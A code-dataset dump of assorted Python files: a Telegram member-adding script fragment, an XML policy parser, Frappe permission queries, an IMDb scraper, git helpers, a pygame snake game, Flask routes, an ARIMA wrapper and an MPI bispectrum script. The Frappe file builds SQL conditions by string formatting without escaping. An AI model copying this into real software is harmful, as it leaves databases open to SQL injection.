\"The user's privacy settings do not allow you to do this. Skipping.\"\n )\n except UserChannelsTooMuchError:\n print(\"User in too much channel. Skipping.\")\n except ChatWriteForbiddenError:\n print(\"You do not have the right to add people to this group\")\n quit()\n except:\n traceback.print_exc()\n print(\"Unexpected Error\")\n continue","sub_path":"add_members.py","file_name":"add_members.py","file_ext":"py","file_size_in_byte":3661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"28458408","text":"'''\nAuthor @ Subhamoy Karmakar\n\nThis is the Module where\n\nInput:\n\nOutput:\n'''\nimport xml.etree.ElementTree as ET\nfrom PolicyCaseFrameVariables import *\n\n\ndef parseXml(fileName):\n tree = ET.parse(fileName)\n root = tree.getroot()\n i = 0\n for child in root:\n tag = str(child.tag)\n if tag == 'policy-name':\n pname = str(child.text)\n elif tag == 'policy-statement':\n pstatement = child.text\n elif tag == 'meta-action':\n meta = child.text\n elif tag == 'action':\n action = child.text\n elif tag == 'condition':\n tmp = root.findall('./condition/con')\n for t in tmp:\n condition.append(t.text)\n elif tag == 'agent':\n tmp = root.findall('./agent/agent-name')\n for t in tmp:\n agent.append(t.text)\n elif tag == 'co-agent':\n tmp = root.findall('./co-agent/co-agent-name')\n for t in tmp:\n coagent.append(t.text)\n elif tag == 'object':\n t_name = root.findall('./object/asset/name')\n t_atype = root.findall('./object/asset/access-type')\n for tn in t_name:\n objasset.append([tn.text, ''])\n for ta in t_atype:\n objasset[i][1] = ta.text\n i = i + 1\n elif tag == 'instrument':\n i = 0\n iname = root.findall('./instrument/ins/name')\n iver = root.findall('./instrument/ins/ver')\n for tn in iname:\n inst.append([tn.text, ''])\n for ta in iver:\n inst[i][1] = ta.text\n i = i + 1\n elif tag == 'recipient':\n i = 0\n rip = root.findall('./recipient/rec/ip')\n rport = root.findall('./recipient/rec/port')\n ratype = root.findall('./recipient/rec/access-type')\n for tn in rip:\n recipient.append([tn.text, '', ''])\n for ta in rport:\n recipient[i][1] = ta.text\n i = i + 1\n i = 0\n for ty in ratype:\n recipient[i][2] = ty.text\n i = i + 1\n elif tag == 'beneficiery':\n tmp = root.findall('./beneficiery/ben')\n for t in tmp:\n beneficiery.append(t.text)\n elif tag == 'time':\n i = 0\n rip = root.findall('./time/constraint/operator')\n rport = root.findall('./time/constraint/high')\n ratype = root.findall('./time/constraint/low')\n for tn in rip:\n time.append([tn.text, '', ''])\n for ta in rport:\n time[i][1] = ta.text\n i = i + 1\n i = 0\n for ty in ratype:\n time[i][2] = ty.text\n i = i + 1\n elif tag == 'site':\n iname = root.findall('./site/location')\n for tn in iname:\n site.append(tn.text)\n elif tag == 'cyber-location':\n iname = root.findall('./cyber-location/cloc')\n for tn in iname:\n cloc.append(tn.text)\n\n\nif '__main__':\n parseXml('remote_access_policy_caseframe.xml')\n","sub_path":"PHASE-1.1_IMPROVEMENT_PHASE/POLICOMP_TOOL/ParsePolicyCaseFrame.py","file_name":"ParsePolicyCaseFrame.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"22759079","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2020, Brandmand and contributors\n# For license information, please see license.txt\n\nfrom __future__ import unicode_literals\nimport frappe\nfrom frappe.model.document import Document\n\nclass Almacen(Document):\n\tpass\n\n\n@frappe.whitelist()\ndef get_permission_query_conditions(user):\n\trelacion = frappe.get_doc(\"Relacion Usuario\", user)\n\n\ttablaActual = \"tabAlmacen\"\n\n\tif relacion.tipo_relacion == \"Cliente\" or relacion.tipo_relacion == \"Proveedor\":\n\t\tfrappe.throw(\"Perfil de usuario inválido\")\n\n\tcadena = \" 1=1 \"\n\tcadenaInvalida = \" 1!=1 \"\n\n\tif relacion.tipo_relacion == \"Administrador\":\n\t\tcadena = cadena + \" AND ({tabla}.empresa = '{empresa}')\".format(tabla=tablaActual, empresa=relacion.empresa)\n\n\t\tif relacion.cliente:\n\t\t\tcadena = cadena + \" AND ({tabla}.cliente = '{cliente}')\".format(tabla=tablaActual, cliente=relacion.cliente)\n\n\t\tif relacion.area:\n\t\t\tcadena = cadena + \" AND ({tabla}.area = '{area}')\".format(tabla=tablaActual, area=relacion.area)\n\n\t\tif relacion.unidad_medica:\n\t\t\tcadena = cadena + \" AND ({tabla}.unidad_medica = '{unidad_medica}')\".format(tabla=tablaActual, unidad_medica=relacion.unidad_medica)\n\telse:\n\t\tif relacion.empresa:\n\t\t\tcadena = cadena + \" AND ({tabla}.empresa = '{empresa}')\".format(tabla=tablaActual, empresa=relacion.empresa)\n\t\telse:\n\t\t\treturn cadenaInvalida\n\n\t\tif relacion.cliente:\n\t\t\tcadena = cadena + \" AND ({tabla}.cliente = '{cliente}')\".format(tabla=tablaActual, cliente=relacion.cliente)\n\t\telse:\n\t\t\treturn cadenaInvalida\n\n\t\tif relacion.area:\n\t\t\tcadena = cadena + \" AND ({tabla}.area = '{area}')\".format(tabla=tablaActual, area=relacion.area)\n\t\telse:\n\t\t\treturn cadenaInvalida\n\n\t\tif relacion.unidad_medica:\n\t\t\tcadena = cadena + \" AND ({tabla}.unidad_medica = '{unidad_medica}')\".format(tabla=tablaActual, unidad_medica=relacion.unidad_medica)\n\t\telse:\n\t\t\treturn cadenaInvalida\n\t\t\t\t\n\t# cadena = cadena + \" AND ({tabla}.cliente IN (SELECT name FROM 'tabCliente' WHERE empresa = '{empresa}')\".format(tabla=tablaActual, empresa=relacion.empresa)\n\n\treturn cadena\n #return \"(tabevent.event_type='public' or tabevent.owner='{user}'\".format(user=frappe.session.user)\n","sub_path":"medmanager/inventario/doctype/almacen/almacen.py","file_name":"almacen.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"595145000","text":"#!/usr/bin/env python3\n\nimport csv\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef construct_person_url(person_id):\n return f'http://www.imdb.com/name/{person_id}/'\n\n\ndef retrieve_person_name(person_id):\n person_url = construct_person_url(person_id)\n\n page = requests.get(person_url)\n soup = BeautifulSoup(page.content, 'html.parser')\n\n name = soup.find('span', {'itemprop': 'name'}).get_text()\n\n return {\n 'imdb_id': person_id,\n 'name': name\n }\n\n\ndef get_director_list():\n source_csv_path = './data/diva_film_data.csv'\n source_file = csv.reader(open(source_csv_path, 'r'))\n\n director_list = []\n\n next(source_file, None) # skips the headers\n\n for row in source_file:\n director_column = row[3]\n split_directors = director_column.split(',')\n for item in split_directors:\n if len(item) != 0:\n director_list.append(item.strip())\n\n return list(set(director_list))\n\n\ndef get_actor_list():\n source_csv_path = './data/diva_film_data.csv'\n source_file = csv.reader(open(source_csv_path, 'r'))\n\n actor_list = []\n\n next(source_file, None) # skips the headers\n\n for row in source_file:\n actor_column = row[8]\n split_actors = actor_column.split(',')\n for item in split_actors:\n if len(item) != 0:\n actor_list.append(item.strip())\n\n return list(set(actor_list))\n\n\ndef retrieve_names(id_list):\n names_and_ids = []\n\n for id in id_list:\n name_and_id = retrieve_person_name(id)\n print(\"name_and_id: \", name_and_id)\n names_and_ids.append(name_and_id)\n\n return names_and_ids\n\n\ndef write_data_to_csv(film_data, type):\n output_csv_path = f'./data/{type}_names.csv'\n output_file = open(output_csv_path, 'w')\n\n film_data_fieldnames = ['imdb_id', 'name']\n\n writer = csv.DictWriter(output_file, fieldnames=film_data_fieldnames)\n\n writer.writeheader()\n\n for row in film_data:\n print(f'Writing row: {row}')\n\n writer.writerow(row)\n\n output_file.close()\n\n\ndirector_list = get_director_list()\ndirector_name_data = retrieve_names(director_list)\n\nwrite_data_to_csv(director_name_data, 'director')\n\nactor_list = get_actor_list()\ntotal_actors = len(actor_list)\n\nall_actor_name_data = []\ncount = 1\n\nfor actor in actor_list:\n name_data = retrieve_person_name(actor)\n print(f'Person number {count} of {total_actors}.')\n print(f'Printing name_data for {actor}. Name data: {name_data}')\n all_actor_name_data.append(name_data)\n count += 1\n\nprint('About to write actor data out to CSV.')\n\nwrite_data_to_csv(all_actor_name_data, 'actor')\n\nprint('Finished!')\n","sub_path":"scripts/get_names_from_ids.py","file_name":"get_names_from_ids.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"169537580","text":"from .program import PROGRAM\nfrom .program import safe_git\nfrom pathlib import Path\n\nCOMMIT_ID_LENGTH = 7\n\n\ndef find_git_root(p='.'):\n p = Path(p).absolute()\n while not (p / '.git' / 'config').exists():\n if p.parent == p:\n return None\n p = p.parent\n return p\n\n\ndef commit_id(name='HEAD', short=False):\n try:\n if name.startswith('~'):\n name = 'HEAD' + name\n elif name.isnumeric() and len(name) < COMMIT_ID_LENGTH:\n name = 'HEAD~' + name\n\n id = safe_git('rev-parse', name, quiet=True)[0]\n if short:\n return id[:COMMIT_ID_LENGTH]\n return id\n\n except Exception:\n return\n\n\ndef fetch(remote):\n fetched = safe_git.fetch(remote)\n while fetched and not fetched.startswith('From '):\n fetched.pop(0)\n if fetched:\n for f in fetched:\n PROGRAM.message(f)\n\n\ndef branch_name(name='HEAD'):\n return safe_git('symbolic-ref', '-q', '--short', name)[0].strip()\n\n\ndef is_workspace_dirty():\n if not find_git_root():\n return False\n try:\n safe_git('diff-index', '--quiet', 'HEAD', '--')\n except Exception:\n # Also returns true if workspace is broken for some other reason\n return True\n\n\ndef branches(*args):\n return safe_git.branch('--format=%(refname:short)', *args)\n\n\ndef remote_branches():\n remotes = safe_git.remote()\n\n for remote in remotes:\n fetch(remote)\n\n result = {}\n for rb in branches('-r'):\n remote, branch = rb.split('/')\n result.setdefault(remote, []).append(branch)\n return result\n\n\ndef upstream_branch():\n # https://stackoverflow.com/a/9753364/43839\n lines = safe_git(*_UPSTREAM, quiet=True)\n return lines[0].split('/', maxsplit=1)\n\n\ndef check_git():\n if not find_git_root():\n PROGRAM.error(_ERROR_NOT_GIT_REPOSITORY)\n PROGRAM.exit()\n\n\ndef check_clean_workspace():\n check_git()\n if is_workspace_dirty():\n PROGRAM.error(_ERROR_CHANGES_OVERWRITTEN)\n PROGRAM.exit()\n\n\ndef force_flags():\n return ['--force-with-lease'] if PROGRAM.args.force else []\n\n\n_UPSTREAM = 'rev-parse --abbrev-ref --symbolic-full-name @{u}'.split()\n_ERROR_CHANGES_OVERWRITTEN = 'Your local changes would be overwritten'\n_ERROR_NOT_GIT_REPOSITORY = (\n 'fatal: not a git repository (or any of the parent directories): .git'\n)\n","sub_path":"gitz/git_functions.py","file_name":"git_functions.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"272071441","text":"from tkinter import *\n\nroot=Tk()\nroot.geometry(\"300x300\")\n\nButton(root,text=\"Hover Me!\",cursor=\"hand2\").pack(pady=100)\n\nroot.mainloop()\n\n#You Can also use below given stylings in place of \"hand2\"\n\"\"\"\nlist = [\n \"arrow\",\n \"circle\",\n \"clock\",\n \"cross\",\n \"dotbox\",\n \"exchange\",\n \"fleur\",\n \"heart\",\n \"man\",\n \"mouse\",\n \"pirate\",\n \"plus\",\n \"shuttle\",\n \"sizing\",\n \"spider\",\n \"spraycan\",\n \"star\",\n \"target\",\n \"tcross\",\n \"trek\",\n]\n\"\"\"\n","sub_path":"Cursor.py","file_name":"Cursor.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"341512748","text":"from food import *\nfrom power_up import *\nfrom snake import *\nimport os\n\n\ndef draw_grid(surface):\n for y in range(0, int(GRID_HEIGHT)):\n for x in range(0, int(GRID_WIDTH)):\n r = pygame.Rect((x * GRIDSIZE, y * GRIDSIZE), (GRIDSIZE, GRIDSIZE))\n pygame.draw.rect(surface, Color.GRID_1.value, r)\n\n\ndef get_new_game_status():\n return {Status.SCORE: BASE_GAME_SCORE,\n Status.SPEED: BASE_GAME_SPEED,\n Status.SCORE_FACTOR: BASE_GAME_SCORE_FACTOR}\n\n\ndef _draw_everthing_on_screen(power_up, snakes, game_status, food, surface, screen, game_font, image_dict):\n for snake in snakes:\n snake.draw(surface, game_status)\n food.draw(surface)\n if power_up:\n power_up.draw(surface)\n screen.blit(surface, (0, 0))\n\n if power_up:\n power_up.write_text(screen, game_font)\n\n # draw players scores:\n text_player_1 = game_font.render(f\"Score {game_status[Status.SCORE]}\", 1, Color.FONT_1.value)\n screen.blit(text_player_1, (SCREEN_WIDTH - 100, 10))\n if len(snakes) == 1:\n text_player_2 = game_font.render(f\"Player2: press space to join\", 1, Color.FONT_2.value)\n else:\n screen.blit(image_dict[\"keyboard_player2\"], (10, 5))\n text_player_2 = game_font.render(f\"Player2 Keys\", 1, Color.FONT_2.value)\n screen.blit(text_player_2, (5, 10))\n pygame.display.update()\n\n\ndef choose_power_up():\n number = random.randint(1, 100)\n if number <= 40:\n return DoubleSpeed()\n elif number <= 80:\n return DoubleScore()\n elif number <= 95:\n return RandomPowerup()\n else:\n return ShortenSnake()\n\n\ndef handle_power_up(power_up, snakes, cur_snake, game_status):\n if power_up is None and 0 <= pygame.time.get_ticks() % 300 <= 10: # after some time there is no power up on screen\n power_up = choose_power_up()\n\n if power_up is not None:\n if cur_snake.get_head_position() == power_up.get_position(): # if snake eat power up\n power_up.active(game_status, snakes) # active it's effect\n power_up = None # remove power up\n\n # TODO handle this better\n # if speed power up duration has finished, remove it's effect\n if Status.SPEED_POWERUP_DURATION in game_status.keys():\n game_status[Status.SPEED_POWERUP_DURATION] -= 0.1\n if game_status[Status.SPEED_POWERUP_DURATION] < 0:\n del game_status[Status.SPEED_POWERUP_DURATION]\n game_status[Status.SPEED] = BASE_GAME_SPEED\n\n # if Score power up duration has finished, remove it's effect\n if Status.SCORE_POWER_UP_DURATION in game_status.keys():\n game_status[Status.SCORE_POWER_UP_DURATION] -= 0.1\n if game_status[Status.SCORE_POWER_UP_DURATION] < 0:\n del game_status[Status.SCORE_POWER_UP_DURATION]\n game_status[Status.SCORE_FACTOR] = BASE_GAME_SCORE_FACTOR\n\n return power_up\n\n\ndef handle_keys(snakes):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_UP:\n snakes[0].turn(UP)\n elif event.key == pygame.K_DOWN:\n snakes[0].turn(DOWN)\n elif event.key == pygame.K_LEFT:\n snakes[0].turn(LEFT)\n elif event.key == pygame.K_RIGHT:\n snakes[0].turn(RIGHT)\n elif event.key == pygame.K_SPACE and len(snakes) == 1:\n snakes.append(Snake(Player.PLAYER_2))\n if len(snakes) >= 2:\n if event.key == pygame.K_w:\n snakes[1].turn(UP)\n if event.key == pygame.K_s:\n snakes[1].turn(DOWN)\n if event.key == pygame.K_a:\n snakes[1].turn(LEFT)\n if event.key == pygame.K_d:\n snakes[1].turn(RIGHT)\n\n\ndef reset_snakes(snakes):\n pygame.time.wait(GAME_OVER_DELAY)\n for snake in snakes:\n snake.reset()\n\n\ndef get_other_snake_positions(snakes, number_of_players, i):\n if number_of_players == 1:\n return None\n if i == 0:\n return snakes[1].positions\n return snakes[0].positions\n\n\ndef update_hall_of_fame(new_score):\n \"\"\":return boolean - True if new scored enter 'hall_of_fame', else False \"\"\"\n # file does not exist -> create it\n if not os.path.isfile(HALL_OF_FAME_FILE_NAME):\n with open(HALL_OF_FAME_FILE_NAME, \"w\") as file1:\n file1.write(str(new_score))\n return True\n\n # file exist:\n with open(HALL_OF_FAME_FILE_NAME, \"r+\") as file1:\n scores_string = file1.read()\n current_scores = [int(score) for score in scores_string.split(\",\")]\n current_min = min(current_scores)\n if len(current_scores) < HALL_OF_FAME_SCORES_MAX_AMOUNT or new_score > current_min:\n if len(current_scores) < HALL_OF_FAME_SCORES_MAX_AMOUNT: # there is a slot left -> enter the new score\n current_scores.append(new_score)\n elif new_score > current_min: # new score is higher then current score-> replace old score with new score\n current_scores[current_scores.index(current_min)] = new_score\n print(\"you are a champion\")\n\n scores_string = \",\".join([str(score) for score in sorted(current_scores, reverse=True)])\n with open(HALL_OF_FAME_FILE_NAME, \"w\") as file1:\n file1.write(str(scores_string))\n return True\n # didn't enter hall of fame\n return False\n\n\ndef print_hall_of_fame(enter_hall_of_fame, new_score, screen, hall_of_fame_font, image_dict):\n screen.fill((40, 40, 40))\n text = hall_of_fame_font.render(\"Hall Of Fame\", 1, Color.FONT_1.value)\n x_pos, y_pos = int(SCREEN_WIDTH / 3), 50\n screen.blit(text, (x_pos, y_pos))\n\n with open(HALL_OF_FAME_FILE_NAME, \"r+\") as file:\n scores = file.read().split(\",\")\n\n for place, score in enumerate(scores):\n if enter_hall_of_fame and str(new_score) == score:\n text = hall_of_fame_font.render(f\"{score} (you)\", 1, Color.FONT_2.value)\n enter_hall_of_fame = False\n else:\n text = hall_of_fame_font.render(score, 1, Color.FONT_1.value)\n y_pos = y_pos + 50\n screen.blit(text, (x_pos, y_pos))\n medal = None\n if place == 0:\n medal = image_dict[\"medal_gold\"]\n elif place == 1:\n medal = image_dict[\"medal_silver\"]\n elif place == 2:\n medal = image_dict[\"medal_bronze\"]\n if medal is not None:\n screen.blit(medal, (x_pos - GRIDSIZE * 5, y_pos))\n pygame.display.update()\n pygame.time.delay(GAME_OVER_DELAY * 2)\n\n\ndef print_game_over(screen, game_over_img):\n screen.blit(game_over_img, (int(SCREEN_WIDTH / 2 - GRIDSIZE*3), int(SCREEN_HEIGHT / 2 - GRIDSIZE*3)))\n pygame.display.update()\n pygame.time.delay(GAME_OVER_DELAY)\n\n\ndef load_game_images(icons_directory = \"icons\"):\n \"\"\" load the classes images, and return the rest of the images (dict)\"\"\"\n\n # create a dict with all the game's images\n image_filenames = os.listdir(icons_directory) # returns list\n image_dict = dict()\n for image_file in image_filenames:\n without_suffix = image_file.split(\".\")[0]\n image_dict[without_suffix] = pygame.image.load(os.path.join(icons_directory, image_file))\n\n # resize classes images and set them\n large_greed = int(GRIDSIZE * 1.3)\n Apple.img = pygame.transform.scale(image_dict['apple'], (large_greed, large_greed))\n Banana.img = pygame.transform.scale(image_dict['banana'], (large_greed, large_greed))\n DoubleScore.img = pygame.transform.scale(image_dict['double_score'], (large_greed, large_greed))\n DoubleSpeed.img = pygame.transform.scale(image_dict['double_speed'], (large_greed, large_greed))\n ShortenSnake.img = pygame.transform.scale(image_dict['shorten_snake'], (large_greed, large_greed))\n RandomPowerup.img = pygame.transform.scale(image_dict['random_powerup'], (large_greed, large_greed))\n\n # resize the remaining images and return them:\n remaining_images = dict()\n remaining_images['game_over'] = pygame.transform.scale(image_dict['game_over'], (GRIDSIZE*6, GRIDSIZE*6))\n medal_size = (GRIDSIZE*3, GRIDSIZE*3)\n remaining_images['medal_gold'] = pygame.transform.scale(image_dict['medal_gold'], medal_size)\n remaining_images['medal_silver'] = pygame.transform.scale(image_dict['medal_silver'], medal_size)\n remaining_images['medal_bronze'] = pygame.transform.scale(image_dict['medal_bronze'], medal_size)\n remaining_images['keyboard_player2'] = pygame.transform.scale(image_dict['keyboard_player2'], medal_size)\n return remaining_images\n\ndef main():\n # Initialize the pygame\n pygame.init()\n\n # create the screen\n screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT), 0, 32)\n surface = pygame.Surface(screen.get_size()) # .convert()\n draw_grid(surface)\n\n # Title and Icon\n pygame.display.set_caption(\"Co-Snake\")\n icon = pygame.image.load(\"icons/game_icon.png\")\n pygame.display.set_icon(icon)\n\n image_dict = load_game_images()\n clock = pygame.time.Clock()\n game_font = pygame.font.SysFont(\"monospace\", 16)\n hall_of_fame_font = pygame.font.SysFont(\"monospace\", 28)\n\n snakes = [Snake(Player.PLAYER_1)]\n food = Apple()\n power_up = DoubleScore()\n game_status = get_new_game_status()\n while True:\n clock.tick(game_status[Status.SPEED])\n handle_keys(snakes)\n number_of_players = len(snakes)\n draw_grid(surface)\n\n for i, cur_snake in enumerate(snakes):\n game_over = cur_snake.move(other_snake_positions=get_other_snake_positions(snakes, number_of_players, i))\n if game_over:\n print_game_over(screen, image_dict[\"game_over\"])\n enter_hall_of_fame = update_hall_of_fame(game_status[Status.SCORE])\n print_hall_of_fame(enter_hall_of_fame, game_status[Status.SCORE], screen, hall_of_fame_font, image_dict)\n reset_snakes(snakes)\n game_status = get_new_game_status()\n\n if cur_snake.get_head_position() == food.position:\n cur_snake.length += 1\n game_status[Status.SCORE] = game_status[Status.SCORE] + (food.get_nutrition_value() * game_status[Status.SCORE_FACTOR])\n food = random.choice([Apple(), Banana()])\n power_up = handle_power_up(power_up, snakes, cur_snake, game_status)\n _draw_everthing_on_screen(power_up, snakes, game_status, food, surface, screen, game_font, image_dict)\n\n\n\n\n\n\n\nif __name__ == '__main__':\n main()","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":10592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"102962992","text":"from flask import request\nfrom flask_bouncer import requires, ensure\n\nfrom app.constants import CREATE, READ, UPDATE, DELETE, LIST\nfrom app.factory import APIResult\nfrom app.decorators import validate_with, paginate\n\nfrom app.deals import deals\nfrom app.deals.models import Deal\nfrom app.deals.schema import create_deal, update_deal\n\n\n@deals.route('/', methods=['POST'])\n@requires(CREATE, Deal)\n@validate_with(create_deal)\ndef create():\n deal = Deal()\n deal.import_data(request.method, request.get_json())\n deal.save()\n return APIResult({'self_url': deal.get_url()}, 201, Link=deal.get_url())\n\n\n@deals.route('/', methods=['GET'])\n@requires(READ, Deal)\ndef read(id):\n deal = Deal.query.get_or_404(id)\n ensure(READ, deal)\n return APIResult(deal.export_data())\n\n\n@deals.route('/', methods=['PUT'])\n@requires(UPDATE, Deal)\n@validate_with(update_deal)\ndef update(id):\n deal = Deal.query.get_or_404(id)\n ensure(UPDATE, deal)\n deal.import_data(request.method, request.get_json())\n deal.save()\n return APIResult({'self_url': deal.get_url()})\n\n\n@deals.route('/', methods=['DELETE'])\n@requires(DELETE, Deal)\ndef delete(id):\n deal = Deal.query.get_or_404(id)\n ensure(DELETE, deal)\n deal.remove()\n return APIResult({}, 204)\n\n\n@deals.route('/', methods=['GET'])\n@requires(LIST, Deal)\n@paginate('deals')\ndef list():\n return Deal.query\n","sub_path":"api/app/deals/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"586204035","text":"import sys\nimport os.path\nimport numpy as np\nimport pandas\nimport typing\nfrom typing import List\n\nfrom Sloth import Sloth\n\nfrom d3m.primitive_interfaces.base import PrimitiveBase, CallResult\n\nfrom d3m import container, utils\nfrom d3m.metadata import hyperparams, base as metadata_base, params\n\n__author__ = 'Distil'\n__version__ = '1.0.2'\n\nInputs = container.pandas.DataFrame\nOutputs = container.List\n\nclass Params(params.Params):\n pass\n\nclass Hyperparams(hyperparams.Hyperparams):\n n_periods = hyperparams.UniformInt(lower = 1, upper = sys.maxsize, default = 18, semantic_types=[\n 'https://metadata.datadrivendiscovery.org/types/TuningParameter'])\n seasonal = hyperparams.UniformBool(default = True, semantic_types = [\n 'https://metadata.datadrivendiscovery.org/types/ControlParameter'],\n description=\"seasonal ARIMA prediction\")\n seasonal_differencing = hyperparams.UniformInt(lower = 1, upper = 365, default = 12, \n semantic_types=['https://metadata.datadrivendiscovery.org/types/TuningParameter'], \n description='period of seasonal differencing')\n pass\n\nclass Parrot(PrimitiveBase[Inputs, Outputs, Params, Hyperparams]):\n metadata = metadata_base.PrimitiveMetadata({\n # Simply an UUID generated once and fixed forever. Generated using \"uuid.uuid4()\".\n 'id': \"d473d487-2c32-49b2-98b5-a2b48571e07c\",\n 'version': __version__,\n 'name': \"parrot\",\n # Keywords do not have a controlled vocabulary. Authors can put here whatever they find suitable.\n 'keywords': ['Time Series'],\n 'source': {\n 'name': __author__,\n 'uris': [\n # Unstructured URIs.\n \"https://github.com/NewKnowledge/parrot-d3m-wrapper\",\n ],\n },\n # A list of dependencies in order. These can be Python packages, system packages, or Docker images.\n # Of course Python packages can also have their own dependencies, but sometimes it is necessary to\n # install a Python package first to be even able to run setup.py of another package. Or you have\n # a dependency which is not on PyPi.\n 'installation': [{\n 'type': metadata_base.PrimitiveInstallationType.PIP,\n 'package': 'cython',\n 'version': '0.28.5',\n },{\n 'type': metadata_base.PrimitiveInstallationType.PIP,\n 'package_uri': 'git+https://github.com/NewKnowledge/parrot-d3m-wrapper.git@{git_commit}#egg=ParrotD3MWrapper'.format(\n git_commit=utils.current_git_commit(os.path.dirname(__file__)),\n ),\n }],\n # The same path the primitive is registered with entry points in setup.py.\n 'python_path': 'd3m.primitives.distil.parrot',\n # Choose these from a controlled vocabulary in the schema. If anything is missing which would\n # best describe the primitive, make a merge request.\n 'algorithm_types': [\n metadata_base.PrimitiveAlgorithmType.AUTOREGRESSIVE_INTEGRATED_MOVING_AVERAGE,\n ],\n 'primitive_family': metadata_base.PrimitiveFamily.TIME_SERIES_FORECASTING,\n })\n\n def __init__(self, *, hyperparams: Hyperparams, random_seed: int = 0)-> None:\n super().__init__(hyperparams=hyperparams, random_seed=random_seed)\n self._params = {}\n self._X_train = None # training inputs\n self._arima = None # ARIMA classifier\n self._sloth = Sloth() # Sloth library \n\n def fit(self) -> None:\n \"\"\"\n Fits ARIMA model using training data from set_training_data and hyperparameters\n \"\"\"\n\n # fits ARIMA model using training data from set_training_data and hyperparameters\n self._arima = self._sloth.FitSeriesARIMA(self._X_train, \n self.hyperparams['seasonal'],\n self.hyperparams['seasonal_differencing'])\n\n def get_params(self) -> Params:\n return self._params\n\n def set_params(self, *, params: Params) -> None:\n self.params = params\n\n def set_training_data(self, *, inputs: Inputs, outputs: Outputs) -> None:\n \"\"\"\n Set primitive's training data\n\n Parameters\n ----------\n inputs : pandas data frame containing training data where first column contains dates and second column contains values\n \n \"\"\"\n self._X_train = inputs\n\n def produce(self, *, inputs: Inputs, timeout: float = None, iterations: int = None) -> CallResult[Outputs]:\n \"\"\"\n Produce primitive's prediction for future time series data\n\n Parameters\n ----------\n None\n\n Returns\n ----------\n Outputs\n The output is a list containing a forecast for each of the 'n_periods' future time periods\n \"\"\"\n\n future_forecast = self._sloth.PredictSeriesARIMA(self._arima, self.hyperparams['n_periods'])\n print(future_forecast)\n return CallResult(future_forecast)\n\nif __name__ == '__main__':\n client = Parrot(hyperparams={'n_periods':18, 'seasonal':True, 'seasonal_differencing':12})\n data = pandas.read_csv(\"Electronic_Production.csv\",index_col=0)\n # select training data from csv\n train = data.loc['1985-01-01':'2016-12-01']\n client.set_training_data(inputs = train, outputs = None)\n client.fit()\n results = client.produce()\n print(results)\n","sub_path":"ParrotD3MWrapper/Parrot.py","file_name":"Parrot.py","file_ext":"py","file_size_in_byte":5432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"179161176","text":"#!/usr/bin/env python\n\n# This script computes the m-averaged bispectrum b. \n# inputs: names of alm1, alm2, and alm3 files, and lmax\n\nfrom mpi4py import MPI\nimport ctypes as ct\nimport numpy as np\nimport os, sys, os.path\nimport argparse\nfrom numba import jit\n\nfrom spherical_geometry import get_hs\nfrom process_fullsky import FGS_SIM_PATH, FGS_RESULTS_PATH, PLANCK_DATA_PATH\nfrom utils import inner_loops\n\nalms_sims_path = PLANCK_DATA_PATH + 'bispectrum_alms/'\n\n# Use default communicator. No need to complicate things.\nCOMM = MPI.COMM_WORLD\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--lmax',default=200, type=int)\nparser.add_argument('--alm1',default='alm.npy')\nparser.add_argument('--alm2',default=None)\nparser.add_argument('--alm3',default=None)\nparser.add_argument('--filename',default='bispectrumtest.npy')\n\nargs = parser.parse_args()\nLMAX = args.lmax\n\nfilename = FGS_RESULTS_PATH + 'bispectra/' + args.filename\n\n# fetch alms:\nalm1 = np.load(alms_sims_path+args.alm1)\nif args.alm2 is not None:\n alm2 = np.load(alms_sims_path+args.alm2)\nelse:\n alm2 = alm1\nif args.alm3 is not None:\n alm3 = np.load(alms_sims_path+args.alm3)\nelse:\n alm3 = alm1\n\n#assert len(alm1)==len(alm2) and len(alm1)==len(alm3) and len(alm1)==LMAX+1, 'problem: alm size(s) and lmax mismatch.'\n \n# fetch w3j's for ms=(0,0,0)s\nhs = get_hs(lmax=LMAX)\n\n\ndef split(container, count):\n \"\"\"\n Simple function splitting a container into equal length chunks.\n Order is not preserved but this is potentially an advantage depending on\n the use case.\n \"\"\"\n return [container[_i::count] for _i in range(count)]\n\n#########\n##########\n###########\nN = LMAX + 1\nif COMM.rank == 0:\n ns = range(N)\n # Split into however many cores are available.\n ns = split(ns, COMM.size)\nelse:\n ns = None\n\n# Scatter jobs across cores.\nns = COMM.scatter(ns, root=0)\n\n \n#initialize bispectrum to be empty\nbispectrum = np.zeros((LMAX+1,LMAX+1,LMAX+1), dtype=complex)\n\nfor i in ns:\n print('on rank {}: i={}'.format(COMM.rank, i))\n inner_loops(i, args.lmax, bispectrum, alm1, alm2, alm3, hs=hs)\n\n# Gather results on rank 0.\nbispectrum = COMM.gather(bispectrum, root=0)\n\nif COMM.rank == 0:\n bispectrum = np.array(bispectrum).sum(axis=0)\n nonzero = ~np.isclose(hs,0.)\n bispectrum[nonzero] = bispectrum[nonzero] / hs[nonzero]\n np.save(filename,bispectrum.real)\n\n\n\n\n","sub_path":"scripts/calc_bispectrum.py","file_name":"calc_bispectrum.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} 